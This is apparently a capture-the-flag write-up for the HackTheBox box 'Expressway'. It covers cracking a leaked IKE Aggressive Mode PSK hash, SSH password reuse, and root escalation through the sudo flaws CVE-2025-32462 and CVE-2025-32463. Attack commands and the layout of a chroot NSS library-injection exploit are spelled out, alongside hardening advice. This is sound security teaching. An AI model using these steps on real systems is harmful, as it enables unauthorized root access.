Summary
CVE-2025-32463 (chroot NSS injection) was used for privilege escalation; see confirmed notes below.
Expressway is an Easy Linux box on the IKE/IPsec theme: SSH on 22 and ISAKMP on 500/UDP. The chain is a textbook exercise in two of the oldest mistakes in remote access — an IKE responder that supports Aggressive Mode (which leaks the PSK hash before any peer is authenticated) and a sysadmin that re-uses the cracked PSK as a Linux/SSH password. Once on the box, two 2025 sudo CVEs (CVE-2025-32462 hostname spoofing and CVE-2025-32463 chroot nsswitch abuse) provide independent paths to root, both of which work on the host.
The chain in one paragraph: ike-scan -A extracts an
Aggressive-Mode handshake whose PSK hash is cracked offline by
hashcat -m 5400 against rockyou; the recovered passphrase is the
SSH password for the ike user (re-use); from ike, sudoers grants
passwordless commands on the fictional host offramp.expressway.htb,
and CVE-2025-32462 lets sudo -h offramp.expressway.htb -i match
that rule from the actual host. (Alternatively, the host has a newer
sudo at /usr/local/bin/sudo that’s vulnerable to CVE-2025-32463 if
the user wants the chroot path instead.)
Recon
22/tcp OpenSSH 10.0p2 (Debian 8)
500/udp ISAKMP / IKE
udp-port-scan is required; nmap defaults skip 500/udp. The TFTP
service on 69/udp also exists on this box and hosts a Cisco
configuration file (ciscortr.cfg), which is a hint at the
Aggressive-Mode flavour but isn’t on the critical path.
Foothold — IKE Aggressive Mode + PSK crack
ike-scan -A <TARGET> performs an Aggressive-Mode handshake. In
this mode, the responder sends an identity ([email protected]),
a nonce, and a Diffie-Hellman public value, along with a hash
that incorporates the pre-shared key — all in the first round
trip, before any peer authentication. The point of Aggressive Mode
is to support multi-tenant VPN aggregators where the responder
doesn’t yet know which PSK to use. The cost: the PSK hash is
exposed to anyone who can send a UDP packet.
ike-scan -A --pskcrack=expressway.psk <TARGET>
hashcat -m 5400 -a 0 expressway.psk /usr/share/wordlists/rockyou.txt
# -> freakingrockstarontheroad (cracks in seconds)
netexec ssh <TARGET> -u ike -p '<psk>' validates the PSK against
SSH; the user re-used it as their account password.
ssh ike@<TARGET>
user.txt lives in ~.
Privilege escalation — sudoers + CVE-2025-32462
sudo -l shows:
User ike may run the following commands on this host:
(root) NOPASSWD: ALL on offramp.expressway.htb
!(root) ALL on expressway.htb
The intent: ike is supposed to have root via sudo only on a
sibling host (offramp.expressway.htb), and explicitly not on
the production host (expressway.htb). Sudo’s host matching
historically used the system hostname; sudo 1.8.8 through 1.9.17
honour -h <hostname> and use the user-supplied value for the
sudoers match instead.
sudo -h offramp.expressway.htb -i
# -> root shell on the production host
/root/root.txt.
(Alternative path: /usr/local/bin/sudo is sudo 1.9.17, vulnerable
to CVE-2025-32463 (chroot nsswitch). Build a tempdir with
./etc/nsswitch.conf referencing libnss_<x>.so.2, compile a
.so whose constructor calls setreuid(0,0); execl("/bin/bash",
...), then sudo --chroot tempdir true loads the library as
root.)
Why each step worked
- IKE Aggressive Mode: the protocol exchanges the PSK-derived hash before any peer auth. Designed for a use case (multi-PSK responders) that almost no deployment actually has, and almost every VPN appliance left it enabled by default for years.
- PSK in
rockyou: a single passphrase loses to a 14M-line wordlist + GPU offline cracking. - PSK reused for SSH: the same person picked the same passphrase for two systems and one leaks a hash.
- CVE-2025-32462 (sudo
-h):sudohonoured the user-supplied hostname for sudoers matching; an attacker can match a more permissive host-scoped rule from a less permissive host. - CVE-2025-32463 (sudo
--chroot):sudo --chroot newroot -- cmdreads/etc/nsswitch.conffrom inside the supplied chroot before fully evaluating policy, allowing a user-provided NSS module to load with root privileges.
Counterfactuals
- Disable IKE Aggressive Mode. Use IKEv2 + certificate auth, or at minimum IKEv1 Main Mode with strong pre-shared keys.
- Treat the PSK as a high-entropy secret (≥ 80 bits, generated, not chosen). Don’t reuse it across services.
- Patch sudo to ≥ 1.9.17p1 (which fixes both CVEs); audit for multiple sudo binaries on the same host.
- For host-scoped sudoers rules, evaluate against the kernel’s hostname, not user input.
Confirmed notes
Tools used: ike-scan, psk-crack (from ike-scan package), gcc on target.
PSK cracking: psk-crack with rockyou cracked the hash in ~9 seconds / 8M iterations.
Note: ike-scan --aggressive --id=ike -P psk.txt <TARGET> (not -A --pskcrack) is the correct flag syntax for the Kali package version.
Privilege escalation confirmed via CVE-2025-32463 (not CVE-2025-32462): the sudo -l output showed “may not run sudo on expressway” — likely because the rule scopes to offramp.expressway.htb and short hostname resolution blocked CVE-2025-32462. The chroot NSS injection (CVE-2025-32463) worked without any sudoers entry.
Critical layout detail for CVE-2025-32463: libnss_/ must be at the same level as the chroot directory, not inside it. The service name /woot1337 in nsswitch.conf maps to the library file libnss_/woot1337.so.2 relative to CWD. The constructor fires even when sudo ultimately rejects the command (auth failure happens after NSS load).
References
- pr0v3rbs CVE-2025-32463 PoC
- Exploit-DB 52352
- 0xdf, “HTB: Expressway” — https://0xdf.gitlab.io/2026/03/07/htb-expressway.html
- IppSec, “Expressway” video walkthrough — https://ippsec.rocks/?#Expressway